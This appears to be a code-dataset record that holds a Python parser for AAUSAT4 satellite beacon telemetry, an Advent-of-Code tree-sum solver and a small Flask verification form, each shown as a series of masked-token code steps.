self.latest_rssi, self.latest_bit_correction, self.latest_byte_correction)) return com_str class ADCS1(object): def __init__(self, adcs1_data): data = struct.unpack('>hhhB', adcs1_data) self.bdot = tuple(data[0:3]) self.state = data[3] def __str__(self): adcs1_str = """ADCS1: State: {} Bdot: {}""".format(self .state, self.bdot) return adcs1_str class ADCS2(object): def __init__(self, adcs2_data): self.gyro = tuple(struct.unpack('>hhh', adcs2_data)) def __str__(self): adcs2_str = """ADCS2: Gyro: {}""".format(self.gyro) return adcs2_str class AIS(object): def __init__(self, ais_data): self.boot_count, _, _, self.unique_mssi, _ = struct.unpack('>HhhH12s', ais_data) def __str__(self): ais_str = ("""AIS: Boot count: {} Unique MSSI: {}""" .format(self.boot_count, self.unique_mssi)) return ais_str class Beacon(object): def __init__(self, raw_data): if len(raw_data) != BEACON_LENGTH: raise ValueError('Malformed beacon (incorrect length)') self.subsystems = {} (valid, eps_raw, com_raw, adcs1_raw, adcs2_raw, ais1_raw, ais2_raw) = ( struct.unpack(('B' + '{}s' * 6).format(EPS_LENGTH, COM_LENGTH, ADCS1_LENGTH, ADCS2_LENGTH, AIS_LENGTH, AIS_LENGTH), raw_data)) eps_valid = valid & 1 << 0 com_valid = valid & 1 << 1 adcs1_valid = valid & 1 << 2 adcs2_valid = valid & 1 << 3 ais1_valid = valid & 1 << 4 ais2_valid = valid & 1 << 5 if eps_valid: self.subsystems['EPS'] = EPS(eps_raw) if com_valid: self.subsystems['COM'] = COM(com_raw) if adcs1_valid: self.subsystems['ADCS1'] = ADCS1(adcs1_raw) if adcs2_valid: self.subsystems['ADCS2'] = ADCS2(adcs2_raw) if ais1_valid: self.subsystems['AIS1'] = AIS(ais1_raw) if ais2_valid: self.subsystems['AIS2'] = AIS(ais2_raw) def __str__(self): beacon_str = '' for k, v in self.subsystems.items(): beacon_str += str(v) + '\n' return beacon_str <|reserved_special_token_1|> from datetime import datetime import struct BEACON_LENGTH = 84 EPS_LENGTH = 20 COM_LENGTH = 10 # reverse engineered ADCS1_LENGTH = 7 ADCS2_LENGTH = 6 AIS_LENGTH = 20 class EPS(object): def __init__(self, eps_data): if len(eps_data) != EPS_LENGTH: raise InputException(len(eps_data), EPS_LENGTH) self.boot_count, self.uptime, self.rt_clock, self.ping_status, self.subsystem_status,\ self.battery_voltage, self.cell_diff, self.battery_current, self.solar_power,\ self.temp, self.pa_temp, self.main_voltage = struct.unpack(">HIIBHBbbBbbb", eps_data) self.battery_voltage *= 40 self.cell_diff *= 4 self.battery_current *= 10 self.solar_power *= 20 def __str__(self): eps_str = ("""EPS: Boot count:\t\t{0} Up time:\t\t{1} seconds Real time clock:\t{2} Battery voltage:\t{3} mV Cell difference:\t{4:.1f} mV Battery current:\t{5} mA Solar power:\t\t{6} Temperature:\t\t{7} C PA temperature:\t\t{8} C""".format( self.boot_count, self.uptime, datetime.fromtimestamp(self.rt_clock), self.battery_voltage, self.cell_diff, self.battery_current, self.solar_power, self.temp, self.pa_temp)) return eps_str class COM(object): def __init__(self, com_data): self.boot_count, self.packets_received, self.packets_send, self.latest_rssi,\ self.latest_bit_correction, self.latest_byte_correction = \ struct.unpack(">HHHhBB", com_data) self.boot_count &= 0x1fff def __str__(self): com_str = ("""COM: Boot count:\t\t{0} Packets received:\t{1} Packets send:\t\t{2} Latest rssi:\t\t{3} Latest bit corrections:\t{4} Latest byte corrections:{5}""".format( self.boot_count, self.packets_received, self.packets_send, self.latest_rssi, self.latest_bit_correction, self.latest_byte_correction)) return com_str # Reverse engineered classes class ADCS1(object): def __init__(self, adcs1_data): data = struct.unpack(">hhhB", adcs1_data) self.bdot = tuple(data[0:3]) self.state = data[3] def __str__(self): adcs1_str = ("""ADCS1: State:\t{} Bdot:\t{}""".format(self.state, self.bdot)) return adcs1_str class ADCS2(object): def __init__(self, adcs2_data): self.gyro = tuple(struct.unpack(">hhh", adcs2_data)) def __str__(self): adcs2_str = ("""ADCS2: Gyro:\t{}""".format(self.gyro)) return adcs2_str class AIS(object): def __init__(self, ais_data): # there are some fields which apparently are 0 all the time # this fields can't be identified by reverse engineering self.boot_count, _, _, self.unique_mssi, _ = struct.unpack(">HhhH12s", ais_data) def __str__(self): ais_str = ("""AIS: Boot count:\t{} Unique MSSI:\t{}""".format(self.boot_count, self.unique_mssi)) return ais_str ## Beacon # The beacon class takes a string of bytes as input, and parses it to generate # a representation of the beacon format used by AASUAT4 # The beacon format is as follows: # [ 1 byte | 19 bytes | 12 bytes | 7 bytes | 6 bytes | 20 bytes | 20 bytes ] # [ Valid | EPS | COM | ADCS1 | ADCS2 | AIS1 | AIS2 ] # This is not correct EPS is 20 bytes and COM is 10 bytes # The remaining fields seem to have the correct length # # For each subsystem, which are valid, are the corresponding data bytes passed to another # class which parses the information. # # The __str__ method returns a human readable string with key information from the beacon class Beacon(object): def __init__(self, raw_data): if len(raw_data) != BEACON_LENGTH: raise ValueError("Malformed beacon (incorrect length)") self.subsystems = {} valid, eps_raw, com_raw, adcs1_raw, adcs2_raw, ais1_raw, ais2_raw = \ struct.unpack(("B"+"{}s"*6).format(EPS_LENGTH, COM_LENGTH, ADCS1_LENGTH, ADCS2_LENGTH, AIS_LENGTH, AIS_LENGTH), raw_data) # reverse engineered valid bits # EPS and COM are known from university team code # valid byte is usually 0x27 # in DK3WN's blog we see that EPS, COM, AIS2 and ADCS1 are valid eps_valid = valid & (1 << 0) com_valid = valid & (1 << 1) adcs1_valid = valid & (1 << 2) adcs2_valid = valid & (1 << 3) ais1_valid = valid & (1 << 4) ais2_valid = valid & (1 << 5) if eps_valid: self.subsystems['EPS'] = EPS(eps_raw) if com_valid: self.subsystems['COM'] = COM(com_raw) if adcs1_valid: self.subsystems['ADCS1'] = ADCS1(adcs1_raw) if adcs2_valid: self.subsystems['ADCS2'] = ADCS2(adcs2_raw) if ais1_valid: self.subsystems['AIS1'] = AIS(ais1_raw) if ais2_valid: self.subsystems['AIS2'] = AIS(ais2_raw) def __str__(self): beacon_str = "" for k,v in self.subsystems.items(): beacon_str += str(v) + "\n" return beacon_str
flexible
{ "blob_id": "505689803c8f4490619ab1a7579fde1e2c18c538", "index": 5532, "step-1": "<mask token>\n\n\nclass ADCS2(object):\n\n def __init__(self, adcs2_data):\n self.gyro = tuple(struct.unpack('>hhh', adcs2_data))\n <mask token>\n\n\nclass AIS(object):\n\n def __init__(self, ais_data):\n self.boot_count, _, _, self.unique_mssi, _ = struct.unpack('>HhhH12s',\n ais_data)\n\n def __str__(self):\n ais_str = (\"\"\"AIS:\n Boot count:\t{}\n Unique MSSI:\t{}\"\"\"\n .format(self.boot_count, self.unique_mssi))\n return ais_str\n\n\nclass Beacon(object):\n\n def __init__(self, raw_data):\n if len(raw_data) != BEACON_LENGTH:\n raise ValueError('Malformed beacon (incorrect length)')\n self.subsystems = {}\n (valid, eps_raw, com_raw, adcs1_raw, adcs2_raw, ais1_raw, ais2_raw) = (\n struct.unpack(('B' + '{}s' * 6).format(EPS_LENGTH, COM_LENGTH,\n ADCS1_LENGTH, ADCS2_LENGTH, AIS_LENGTH, AIS_LENGTH), raw_data))\n eps_valid = valid & 1 << 0\n com_valid = valid & 1 << 1\n adcs1_valid = valid & 1 << 2\n adcs2_valid = valid & 1 << 3\n ais1_valid = valid & 1 << 4\n ais2_valid = valid & 1 << 5\n if eps_valid:\n self.subsystems['EPS'] = EPS(eps_raw)\n if com_valid:\n self.subsystems['COM'] = COM(com_raw)\n if adcs1_valid:\n self.subsystems['ADCS1'] = ADCS1(adcs1_raw)\n if adcs2_valid:\n self.subsystems['ADCS2'] = ADCS2(adcs2_raw)\n if ais1_valid:\n self.subsystems['AIS1'] = AIS(ais1_raw)\n if ais2_valid:\n self.subsystems['AIS2'] = AIS(ais2_raw)\n\n def __str__(self):\n beacon_str = ''\n for k, v in self.subsystems.items():\n beacon_str += str(v) + '\\n'\n return beacon_str\n", "step-2": "<mask token>\n\n\nclass ADCS1(object):\n <mask token>\n <mask token>\n\n\nclass ADCS2(object):\n\n def __init__(self, adcs2_data):\n self.gyro = tuple(struct.unpack('>hhh', adcs2_data))\n\n def __str__(self):\n adcs2_str = \"\"\"ADCS2:\n Gyro:\t{}\"\"\".format(self.gyro)\n return adcs2_str\n\n\nclass AIS(object):\n\n def __init__(self, ais_data):\n self.boot_count, _, _, self.unique_mssi, _ = struct.unpack('>HhhH12s',\n ais_data)\n\n def __str__(self):\n ais_str = (\"\"\"AIS:\n Boot count:\t{}\n Unique MSSI:\t{}\"\"\"\n .format(self.boot_count, self.unique_mssi))\n return ais_str\n\n\nclass Beacon(object):\n\n def __init__(self, raw_data):\n if len(raw_data) != BEACON_LENGTH:\n raise ValueError('Malformed beacon (incorrect length)')\n self.subsystems = {}\n (valid, eps_raw, com_raw, adcs1_raw, adcs2_raw, ais1_raw, ais2_raw) = (\n struct.unpack(('B' + '{}s' * 6).format(EPS_LENGTH, COM_LENGTH,\n ADCS1_LENGTH, ADCS2_LENGTH, AIS_LENGTH, AIS_LENGTH), raw_data))\n eps_valid = valid & 1 << 0\n com_valid = valid & 1 << 1\n adcs1_valid = valid & 1 << 2\n adcs2_valid = valid & 1 << 3\n ais1_valid = valid & 1 << 4\n ais2_valid = valid & 1 << 5\n if eps_valid:\n self.subsystems['EPS'] = EPS(eps_raw)\n if com_valid:\n self.subsystems['COM'] = COM(com_raw)\n if adcs1_valid:\n self.subsystems['ADCS1'] = ADCS1(adcs1_raw)\n if adcs2_valid:\n self.subsystems['ADCS2'] = ADCS2(adcs2_raw)\n if ais1_valid:\n self.subsystems['AIS1'] = AIS(ais1_raw)\n if ais2_valid:\n self.subsystems['AIS2'] = AIS(ais2_raw)\n\n def __str__(self):\n beacon_str = ''\n for k, v in self.subsystems.items():\n beacon_str += str(v) + '\\n'\n return beacon_str\n", "step-3": "<mask token>\nBEACON_LENGTH = 84\nEPS_LENGTH = 20\nCOM_LENGTH = 10\nADCS1_LENGTH = 7\nADCS2_LENGTH = 6\nAIS_LENGTH = 20\n\n\nclass EPS(object):\n\n def __init__(self, eps_data):\n if len(eps_data) != EPS_LENGTH:\n raise InputException(len(eps_data), EPS_LENGTH)\n (self.boot_count, self.uptime, self.rt_clock, self.ping_status,\n self.subsystem_status, self.battery_voltage, self.cell_diff,\n self.battery_current, self.solar_power, self.temp, self.pa_temp,\n self.main_voltage) = struct.unpack('>HIIBHBbbBbbb', eps_data)\n self.battery_voltage *= 40\n self.cell_diff *= 4\n self.battery_current *= 10\n self.solar_power *= 20\n\n def __str__(self):\n eps_str = (\n \"\"\"EPS:\n Boot count:\t\t{0}\n Up time:\t\t{1} seconds\n Real time clock:\t{2}\n Battery voltage:\t{3} mV\n Cell difference:\t{4:.1f} mV\n Battery current:\t{5} mA\n Solar power:\t\t{6}\n Temperature:\t\t{7} C\n PA temperature:\t\t{8} C\"\"\"\n .format(self.boot_count, self.uptime, datetime.fromtimestamp(\n self.rt_clock), self.battery_voltage, self.cell_diff, self.\n battery_current, self.solar_power, self.temp, self.pa_temp))\n return eps_str\n\n\nclass COM(object):\n\n def __init__(self, com_data):\n (self.boot_count, self.packets_received, self.packets_send, self.\n latest_rssi, self.latest_bit_correction, self.\n latest_byte_correction) = struct.unpack('>HHHhBB', com_data)\n self.boot_count &= 8191\n\n def __str__(self):\n com_str = (\n \"\"\"COM:\n Boot count:\t\t{0}\n Packets received:\t{1}\n Packets send:\t\t{2}\n Latest rssi:\t\t{3}\n Latest bit corrections:\t{4}\n Latest byte corrections:{5}\"\"\"\n .format(self.boot_count, self.packets_received, self.\n packets_send, self.latest_rssi, self.latest_bit_correction,\n self.latest_byte_correction))\n return com_str\n\n\nclass ADCS1(object):\n\n def __init__(self, adcs1_data):\n data = struct.unpack('>hhhB', adcs1_data)\n self.bdot = tuple(data[0:3])\n self.state = data[3]\n\n def __str__(self):\n adcs1_str = \"\"\"ADCS1:\n State:\t{}\n Bdot:\t{}\"\"\".format(self\n .state, self.bdot)\n return adcs1_str\n\n\nclass ADCS2(object):\n\n def __init__(self, adcs2_data):\n self.gyro = tuple(struct.unpack('>hhh', adcs2_data))\n\n def __str__(self):\n adcs2_str = \"\"\"ADCS2:\n Gyro:\t{}\"\"\".format(self.gyro)\n return adcs2_str\n\n\nclass AIS(object):\n\n def __init__(self, ais_data):\n self.boot_count, _, _, self.unique_mssi, _ = struct.unpack('>HhhH12s',\n ais_data)\n\n def __str__(self):\n ais_str = (\"\"\"AIS:\n Boot count:\t{}\n Unique MSSI:\t{}\"\"\"\n .format(self.boot_count, self.unique_mssi))\n return ais_str\n\n\nclass Beacon(object):\n\n def __init__(self, raw_data):\n if len(raw_data) != BEACON_LENGTH:\n raise ValueError('Malformed beacon (incorrect length)')\n self.subsystems = {}\n (valid, eps_raw, com_raw, adcs1_raw, adcs2_raw, ais1_raw, ais2_raw) = (\n struct.unpack(('B' + '{}s' * 6).format(EPS_LENGTH, COM_LENGTH,\n ADCS1_LENGTH, ADCS2_LENGTH, AIS_LENGTH, AIS_LENGTH), raw_data))\n eps_valid = valid & 1 << 0\n com_valid = valid & 1 << 1\n adcs1_valid = valid & 1 << 2\n adcs2_valid = valid & 1 << 3\n ais1_valid = valid & 1 << 4\n ais2_valid = valid & 1 << 5\n if eps_valid:\n self.subsystems['EPS'] = EPS(eps_raw)\n if com_valid:\n self.subsystems['COM'] = COM(com_raw)\n if adcs1_valid:\n self.subsystems['ADCS1'] = ADCS1(adcs1_raw)\n if adcs2_valid:\n self.subsystems['ADCS2'] = ADCS2(adcs2_raw)\n if ais1_valid:\n self.subsystems['AIS1'] = AIS(ais1_raw)\n if ais2_valid:\n self.subsystems['AIS2'] = AIS(ais2_raw)\n\n def __str__(self):\n beacon_str = ''\n for k, v in self.subsystems.items():\n beacon_str += str(v) + '\\n'\n return beacon_str\n", "step-4": "from datetime import datetime\nimport struct\nBEACON_LENGTH = 84\nEPS_LENGTH = 20\nCOM_LENGTH = 10\nADCS1_LENGTH = 7\nADCS2_LENGTH = 6\nAIS_LENGTH = 20\n\n\nclass EPS(object):\n\n def __init__(self, eps_data):\n if len(eps_data) != EPS_LENGTH:\n raise InputException(len(eps_data), EPS_LENGTH)\n (self.boot_count, self.uptime, self.rt_clock, self.ping_status,\n self.subsystem_status, self.battery_voltage, self.cell_diff,\n self.battery_current, self.solar_power, self.temp, self.pa_temp,\n self.main_voltage) = struct.unpack('>HIIBHBbbBbbb', eps_data)\n self.battery_voltage *= 40\n self.cell_diff *= 4\n self.battery_current *= 10\n self.solar_power *= 20\n\n def __str__(self):\n eps_str = (\n \"\"\"EPS:\n Boot count:\t\t{0}\n Up time:\t\t{1} seconds\n Real time clock:\t{2}\n Battery voltage:\t{3} mV\n Cell difference:\t{4:.1f} mV\n Battery current:\t{5} mA\n Solar power:\t\t{6}\n Temperature:\t\t{7} C\n PA temperature:\t\t{8} C\"\"\"\n .format(self.boot_count, self.uptime, datetime.fromtimestamp(\n self.rt_clock), self.battery_voltage, self.cell_diff, self.\n battery_current, self.solar_power, self.temp, self.pa_temp))\n return eps_str\n\n\nclass COM(object):\n\n def __init__(self, com_data):\n (self.boot_count, self.packets_received, self.packets_send, self.\n latest_rssi, self.latest_bit_correction, self.\n latest_byte_correction) = struct.unpack('>HHHhBB', com_data)\n self.boot_count &= 8191\n\n def __str__(self):\n com_str = (\n \"\"\"COM:\n Boot count:\t\t{0}\n Packets received:\t{1}\n Packets send:\t\t{2}\n Latest rssi:\t\t{3}\n Latest bit corrections:\t{4}\n Latest byte corrections:{5}\"\"\"\n .format(self.boot_count, self.packets_received, self.\n packets_send, self.latest_rssi, self.latest_bit_correction,\n self.latest_byte_correction))\n return com_str\n\n\nclass ADCS1(object):\n\n def __init__(self, adcs1_data):\n data = struct.unpack('>hhhB', adcs1_data)\n self.bdot = tuple(data[0:3])\n self.state = data[3]\n\n def __str__(self):\n adcs1_str = \"\"\"ADCS1:\n State:\t{}\n Bdot:\t{}\"\"\".format(self\n .state, self.bdot)\n return adcs1_str\n\n\nclass ADCS2(object):\n\n def __init__(self, adcs2_data):\n self.gyro = tuple(struct.unpack('>hhh', adcs2_data))\n\n def __str__(self):\n adcs2_str = \"\"\"ADCS2:\n Gyro:\t{}\"\"\".format(self.gyro)\n return adcs2_str\n\n\nclass AIS(object):\n\n def __init__(self, ais_data):\n self.boot_count, _, _, self.unique_mssi, _ = struct.unpack('>HhhH12s',\n ais_data)\n\n def __str__(self):\n ais_str = (\"\"\"AIS:\n Boot count:\t{}\n Unique MSSI:\t{}\"\"\"\n .format(self.boot_count, self.unique_mssi))\n return ais_str\n\n\nclass Beacon(object):\n\n def __init__(self, raw_data):\n if len(raw_data) != BEACON_LENGTH:\n raise ValueError('Malformed beacon (incorrect length)')\n self.subsystems = {}\n (valid, eps_raw, com_raw, adcs1_raw, adcs2_raw, ais1_raw, ais2_raw) = (\n struct.unpack(('B' + '{}s' * 6).format(EPS_LENGTH, COM_LENGTH,\n ADCS1_LENGTH, ADCS2_LENGTH, AIS_LENGTH, AIS_LENGTH), raw_data))\n eps_valid = valid & 1 << 0\n com_valid = valid & 1 << 1\n adcs1_valid = valid & 1 << 2\n adcs2_valid = valid & 1 << 3\n ais1_valid = valid & 1 << 4\n ais2_valid = valid & 1 << 5\n if eps_valid:\n self.subsystems['EPS'] = EPS(eps_raw)\n if com_valid:\n self.subsystems['COM'] = COM(com_raw)\n if adcs1_valid:\n self.subsystems['ADCS1'] = ADCS1(adcs1_raw)\n if adcs2_valid:\n self.subsystems['ADCS2'] = ADCS2(adcs2_raw)\n if ais1_valid:\n self.subsystems['AIS1'] = AIS(ais1_raw)\n if ais2_valid:\n self.subsystems['AIS2'] = AIS(ais2_raw)\n\n def __str__(self):\n beacon_str = ''\n for k, v in self.subsystems.items():\n beacon_str += str(v) + '\\n'\n return beacon_str\n", "step-5": "from datetime import datetime\nimport struct\n\nBEACON_LENGTH = 84\nEPS_LENGTH = 20\nCOM_LENGTH = 10\n\n# reverse engineered\nADCS1_LENGTH = 7\nADCS2_LENGTH = 6\nAIS_LENGTH = 20\n\nclass EPS(object):\n def __init__(self, eps_data):\n if len(eps_data) != EPS_LENGTH:\n raise InputException(len(eps_data), EPS_LENGTH)\n\n self.boot_count, self.uptime, self.rt_clock, self.ping_status, self.subsystem_status,\\\n self.battery_voltage, self.cell_diff, self.battery_current, self.solar_power,\\\n self.temp, self.pa_temp, self.main_voltage = struct.unpack(\">HIIBHBbbBbbb\", eps_data)\n\n self.battery_voltage *= 40\n self.cell_diff *= 4\n self.battery_current *= 10\n self.solar_power *= 20\n\n def __str__(self):\n eps_str = (\"\"\"EPS:\n Boot count:\\t\\t{0}\n Up time:\\t\\t{1} seconds\n Real time clock:\\t{2}\n Battery voltage:\\t{3} mV\n Cell difference:\\t{4:.1f} mV\n Battery current:\\t{5} mA\n Solar power:\\t\\t{6}\n Temperature:\\t\\t{7} C\n PA temperature:\\t\\t{8} C\"\"\".format(\n self.boot_count, self.uptime, datetime.fromtimestamp(self.rt_clock),\n self.battery_voltage, self.cell_diff, self.battery_current, self.solar_power,\n self.temp, self.pa_temp))\n\n return eps_str\n\n\nclass COM(object):\n def __init__(self, com_data):\n self.boot_count, self.packets_received, self.packets_send, self.latest_rssi,\\\n self.latest_bit_correction, self.latest_byte_correction = \\\n struct.unpack(\">HHHhBB\", com_data)\n\n self.boot_count &= 0x1fff\n \n def __str__(self):\n com_str = (\"\"\"COM:\n Boot count:\\t\\t{0}\n Packets received:\\t{1}\n Packets send:\\t\\t{2}\n Latest rssi:\\t\\t{3}\n Latest bit corrections:\\t{4}\n Latest byte corrections:{5}\"\"\".format(\n self.boot_count, self.packets_received, self.packets_send,\n self.latest_rssi, self.latest_bit_correction, self.latest_byte_correction))\n\n return com_str\n\n# Reverse engineered classes\nclass ADCS1(object):\n def __init__(self, adcs1_data):\n data = struct.unpack(\">hhhB\", adcs1_data)\n self.bdot = tuple(data[0:3])\n self.state = data[3]\n\n def __str__(self):\n adcs1_str = (\"\"\"ADCS1:\n State:\\t{}\n Bdot:\\t{}\"\"\".format(self.state, self.bdot))\n\n return adcs1_str\n\nclass ADCS2(object):\n def __init__(self, adcs2_data):\n self.gyro = tuple(struct.unpack(\">hhh\", adcs2_data))\n\n def __str__(self):\n adcs2_str = (\"\"\"ADCS2:\n Gyro:\\t{}\"\"\".format(self.gyro))\n\n return adcs2_str\n\nclass AIS(object):\n def __init__(self, ais_data):\n # there are some fields which apparently are 0 all the time\n # this fields can't be identified by reverse engineering\n self.boot_count, _, _, self.unique_mssi, _ = struct.unpack(\">HhhH12s\", ais_data)\n\n def __str__(self):\n ais_str = (\"\"\"AIS:\n Boot count:\\t{}\n Unique MSSI:\\t{}\"\"\".format(self.boot_count, self.unique_mssi))\n\n return ais_str\n\n## Beacon\n# The beacon class takes a string of bytes as input, and parses it to generate\n# a representation of the beacon format used by AASUAT4\n# The beacon format is as follows:\n\n\n# [ 1 byte | 19 bytes | 12 bytes | 7 bytes | 6 bytes | 20 bytes | 20 bytes ]\n# [ Valid | EPS | COM | ADCS1 | ADCS2 | AIS1 | AIS2 ]\n# This is not correct EPS is 20 bytes and COM is 10 bytes\n# The remaining fields seem to have the correct length\n\n#\n# For each subsystem, which are valid, are the corresponding data bytes passed to another\n# class which parses the information.\n#\n# The __str__ method returns a human readable string with key information from the beacon\nclass Beacon(object):\n \n def __init__(self, raw_data):\n if len(raw_data) != BEACON_LENGTH:\n raise ValueError(\"Malformed beacon (incorrect length)\")\n\n self.subsystems = {}\n\n valid, eps_raw, com_raw, adcs1_raw, adcs2_raw, ais1_raw, ais2_raw = \\\n struct.unpack((\"B\"+\"{}s\"*6).format(EPS_LENGTH, COM_LENGTH, ADCS1_LENGTH, ADCS2_LENGTH, AIS_LENGTH, AIS_LENGTH), raw_data)\n\n # reverse engineered valid bits\n # EPS and COM are known from university team code\n # valid byte is usually 0x27\n # in DK3WN's blog we see that EPS, COM, AIS2 and ADCS1 are valid\n eps_valid = valid & (1 << 0)\n com_valid = valid & (1 << 1)\n adcs1_valid = valid & (1 << 2)\n adcs2_valid = valid & (1 << 3)\n ais1_valid = valid & (1 << 4)\n ais2_valid = valid & (1 << 5)\n \n if eps_valid:\n self.subsystems['EPS'] = EPS(eps_raw)\n if com_valid:\n self.subsystems['COM'] = COM(com_raw)\n if adcs1_valid:\n self.subsystems['ADCS1'] = ADCS1(adcs1_raw)\n if adcs2_valid:\n self.subsystems['ADCS2'] = ADCS2(adcs2_raw)\n if ais1_valid:\n self.subsystems['AIS1'] = AIS(ais1_raw)\n if ais2_valid:\n self.subsystems['AIS2'] = AIS(ais2_raw)\n \n def __str__(self):\n beacon_str = \"\"\n for k,v in self.subsystems.items():\n beacon_str += str(v) + \"\\n\"\n return beacon_str\n\n", "step-ids": [ 8, 10, 19, 20, 21 ] }
[ 8, 10, 19, 20, 21 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class VerifyHandphoneForm(Form): <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class VerifyHandphoneForm(Form): handphone_hash = TextField('Enter verification code here', validators=[ Required()]) <|reserved_special_token_1|> from flask.ext.wtf import Form from wtforms import TextField from wtforms.validators import Required class VerifyHandphoneForm(Form): handphone_hash = TextField('Enter verification code here', validators=[ Required()])
flexible
{ "blob_id": "cb0df06ee474576b3024678fa0f63ce400d773ea", "index": 4096, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass VerifyHandphoneForm(Form):\n <mask token>\n", "step-3": "<mask token>\n\n\nclass VerifyHandphoneForm(Form):\n handphone_hash = TextField('Enter verification code here', validators=[\n Required()])\n", "step-4": "from flask.ext.wtf import Form\nfrom wtforms import TextField\nfrom wtforms.validators import Required\n\n\nclass VerifyHandphoneForm(Form):\n handphone_hash = TextField('Enter verification code here', validators=[\n Required()])\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
class Day8MemoryManeuver: <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_1|> class Day8MemoryManeuver: <|reserved_special_token_0|> <|reserved_special_token_0|> def _solve(self, structure, pos): if pos >= len(structure): return pos, 0 child_node_count = int(structure[pos]) pos += 1 meta_count = int(structure[pos]) result = 0 child_results = [] for i in range(child_node_count): pos += 1 pos, tmp = self._solve(structure, pos) if not self._use_child_references: result += tmp child_results.append(tmp) if meta_count > 0: for i in range(pos, pos + meta_count): current = int(structure[i + 1]) if self._use_child_references and child_node_count > 0: if current <= len(child_results): result += child_results[current - 1] else: result += current pos += 1 return pos, result <|reserved_special_token_1|> class Day8MemoryManeuver: <|reserved_special_token_0|> def solve(self, license_input): _, result = self._solve(license_input.split(' '), 0) return result def _solve(self, structure, pos): if pos >= len(structure): return pos, 0 child_node_count = int(structure[pos]) pos += 1 meta_count = int(structure[pos]) result = 0 child_results = [] for i in range(child_node_count): pos += 1 pos, tmp = self._solve(structure, pos) if not self._use_child_references: result += tmp child_results.append(tmp) if meta_count > 0: for i in range(pos, pos + meta_count): current = int(structure[i + 1]) if self._use_child_references and child_node_count > 0: if current <= len(child_results): result += child_results[current - 1] else: result += current pos += 1 return pos, result <|reserved_special_token_1|> class Day8MemoryManeuver: def __init__(self, use_reference_count=False): """ Args: use_reference_count (bool): True: If an entry has child nodes, the meta data are referring to the results of the child node False: Sum all meta data up """ self._use_child_references = use_reference_count def solve(self, license_input): _, result = self._solve(license_input.split(' '), 0) return result def _solve(self, structure, pos): if pos >= len(structure): return pos, 0 child_node_count = int(structure[pos]) pos += 1 meta_count = int(structure[pos]) result = 0 child_results = [] for i in range(child_node_count): pos += 1 pos, tmp = self._solve(structure, pos) if not self._use_child_references: result += tmp child_results.append(tmp) if meta_count > 0: for i in range(pos, pos + meta_count): current = int(structure[i + 1]) if self._use_child_references and child_node_count > 0: if current <= len(child_results): result += child_results[current - 1] else: result += current pos += 1 return pos, result <|reserved_special_token_1|> class Day8MemoryManeuver: def __init__(self, use_reference_count=False): """ Args: use_reference_count (bool): True: If an entry has child nodes, the meta data are referring to the results of the child node False: Sum all meta data up """ self._use_child_references = use_reference_count def solve(self, license_input): _, result = self._solve(license_input.split(" "), 0) return result def _solve(self, structure, pos): if pos >= len(structure): return pos, 0 child_node_count = int(structure[pos]) pos += 1 meta_count = int(structure[pos]) result = 0 child_results = [] for i in range(child_node_count): pos += 1 pos, tmp = self._solve(structure, pos) if not self._use_child_references: result += tmp child_results.append(tmp) if meta_count > 0: for i in range(pos, pos + meta_count): current = int(structure[i + 1]) if self._use_child_references and child_node_count > 0: if current <= len(child_results): result += child_results[current - 1] else: result += current pos += 1 return pos, result
flexible
{ "blob_id": "84d096a51fa052ee210e975ab61c0cbbf05bc5ae", "index": 8358, "step-1": "class Day8MemoryManeuver:\n <mask token>\n <mask token>\n <mask token>\n", "step-2": "class Day8MemoryManeuver:\n <mask token>\n <mask token>\n\n def _solve(self, structure, pos):\n if pos >= len(structure):\n return pos, 0\n child_node_count = int(structure[pos])\n pos += 1\n meta_count = int(structure[pos])\n result = 0\n child_results = []\n for i in range(child_node_count):\n pos += 1\n pos, tmp = self._solve(structure, pos)\n if not self._use_child_references:\n result += tmp\n child_results.append(tmp)\n if meta_count > 0:\n for i in range(pos, pos + meta_count):\n current = int(structure[i + 1])\n if self._use_child_references and child_node_count > 0:\n if current <= len(child_results):\n result += child_results[current - 1]\n else:\n result += current\n pos += 1\n return pos, result\n", "step-3": "class Day8MemoryManeuver:\n <mask token>\n\n def solve(self, license_input):\n _, result = self._solve(license_input.split(' '), 0)\n return result\n\n def _solve(self, structure, pos):\n if pos >= len(structure):\n return pos, 0\n child_node_count = int(structure[pos])\n pos += 1\n meta_count = int(structure[pos])\n result = 0\n child_results = []\n for i in range(child_node_count):\n pos += 1\n pos, tmp = self._solve(structure, pos)\n if not self._use_child_references:\n result += tmp\n child_results.append(tmp)\n if meta_count > 0:\n for i in range(pos, pos + meta_count):\n current = int(structure[i + 1])\n if self._use_child_references and child_node_count > 0:\n if current <= len(child_results):\n result += child_results[current - 1]\n else:\n result += current\n pos += 1\n return pos, result\n", "step-4": "class Day8MemoryManeuver:\n\n def __init__(self, use_reference_count=False):\n \"\"\"\n Args:\n use_reference_count (bool):\n True: If an entry has child nodes, the meta data are referring to the results of\n the child node\n False: Sum all meta data up\n \"\"\"\n self._use_child_references = use_reference_count\n\n def solve(self, license_input):\n _, result = self._solve(license_input.split(' '), 0)\n return result\n\n def _solve(self, structure, pos):\n if pos >= len(structure):\n return pos, 0\n child_node_count = int(structure[pos])\n pos += 1\n meta_count = int(structure[pos])\n result = 0\n child_results = []\n for i in range(child_node_count):\n pos += 1\n pos, tmp = self._solve(structure, pos)\n if not self._use_child_references:\n result += tmp\n child_results.append(tmp)\n if meta_count > 0:\n for i in range(pos, pos + meta_count):\n current = int(structure[i + 1])\n if self._use_child_references and child_node_count > 0:\n if current <= len(child_results):\n result += child_results[current - 1]\n else:\n result += current\n pos += 1\n return pos, result\n", "step-5": "class Day8MemoryManeuver:\n def __init__(self, use_reference_count=False):\n \"\"\"\n Args:\n use_reference_count (bool):\n True: If an entry has child nodes, the meta data are referring to the results of\n the child node\n False: Sum all meta data up\n \"\"\"\n self._use_child_references = use_reference_count\n\n def solve(self, license_input):\n _, result = self._solve(license_input.split(\" \"), 0)\n return result\n\n def _solve(self, structure, pos):\n if pos >= len(structure):\n return pos, 0\n child_node_count = int(structure[pos])\n pos += 1\n meta_count = int(structure[pos])\n result = 0\n child_results = []\n for i in range(child_node_count):\n pos += 1\n pos, tmp = self._solve(structure, pos)\n if not self._use_child_references:\n result += tmp\n child_results.append(tmp)\n if meta_count > 0:\n for i in range(pos, pos + meta_count):\n current = int(structure[i + 1])\n if 